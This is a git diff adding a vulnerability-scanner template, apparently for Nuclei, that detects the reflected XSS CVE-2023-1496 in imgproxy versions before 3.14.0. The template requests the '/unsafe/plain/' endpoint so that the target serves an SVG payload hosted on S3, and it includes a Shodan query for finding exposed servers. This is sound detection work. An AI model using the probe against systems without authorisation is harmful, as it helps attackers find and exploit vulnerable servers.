diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml new file mode 100644 index 0000000000..7ea435252d --- /dev/null +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-1496 + +info: + name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS) + author: pdteam + severity: medium + description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + reference: + - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689 + - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-1496 + cwe-id: CWE-79 + epss-score: 0.00051 + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: "Server: imgproxy" + tags: cve,cve2023,imgproxy,xss,svg + +http: + - method: GET + path: + - "{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg" + + matchers: + - type: dsl + dsl: + - contains(body, 'PC9zdmc+#test') + - status_code == 200 + condition: and + + extractors: + - type: dsl + dsl: + - content_security_policy